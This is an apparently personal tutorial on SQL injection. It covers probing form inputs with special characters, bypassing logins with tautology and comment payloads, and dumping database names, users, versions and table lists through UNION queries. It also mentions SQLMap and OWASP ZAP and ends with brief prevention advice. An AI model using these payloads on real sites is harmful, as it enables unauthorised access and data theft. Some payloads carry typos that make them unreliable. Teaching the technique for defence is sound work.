SQL Injection

All websites that make interaction with a DB, use SQL.

But if the SQL script is not correctly written could be passible of some manipulation using the html form parameters, in which the attacker could put a malicious SQL code.

So to find a SQL Injection is very critical because it gives access to the entire DB as as admin.

How to discover SQL Injections

The easy way is to put in the html form input text some special SQL character like ‘ (single quote) ” (double quote) # (comment) and so on and see what happens.

We could get multiple result. An exception that could show the query which went wrong for instance.

Bypassing logins using SQL Injections

In a user/password login page we could set the username and in the password field we could specify the piece of query to continue the query of the login:

Let’s say that the query to login could be something like this:

select * from users where username='$username' and password='$password'

Where $username and $password are dynamically passed from the frontend.

Now, the login query could be hacked specifying a piece of sql as password.

For instance, the password field could be

password' and 1=1, in this way the query will be

select * from users where username='$username' and password='password' and 1=1

the worse sql injection could be:

$username = admin (or the whatever admin username)

$password = 123456′ or 1=1

In this case the query becomes:

select * from users where username='admin' and password='123456' or 1=1

Executing that query, assuming that admin is a real admin username, that query will always return true, even the password used is not correct, allowing us to enter as administrator.

Another way to use sql injection to try to bypass login is with comments just after the username, becasue whetever is written after comments is not used.

For instance a query like this:

select * from users where username = 'admin' #and password ='ciccio'

will return the user wich username is admin whatever could be the password.

In order to ahve a query like the above in the username we need to specify

$username = admin’ #

$password = whateverWeWant

The last query is the most interesting one because it allows us to have more complex query to gather more information from the database.

For instance we can add a union to get something else:

select * from users where username = 'admin' union select 1, database(), user(), version(), 5 #and password ='whateverWeWant'

In this case what we did was to use the following parameters:

$username = admin’ union select 1, database(), user(), version(), 5#

$password = whateverWeWant

Or, we can get DB information schema using another query after the union:

$username = admin’ union select 1, table_name, null, null, 5 from invormation_schemaa.tables#

$password = whateverWeWant

In this way you can get whatever you want from the DB, just putting an union query with the same column number of the first query (in our example is select * from users)

Discover SQL Injections

We can use

SQLMap cli tool to automate the sql injections using a specific url

OWASP ZAP, a UI tools very easy to use which find possibile SQL injections (but actually also other type of exploitations) on the entire website specifying also the field parameters to use 🙂

Prevent SQL Injection

To prevent sql injection on your sql scripts try to:

  • filter inputs
  • use parameterised statements!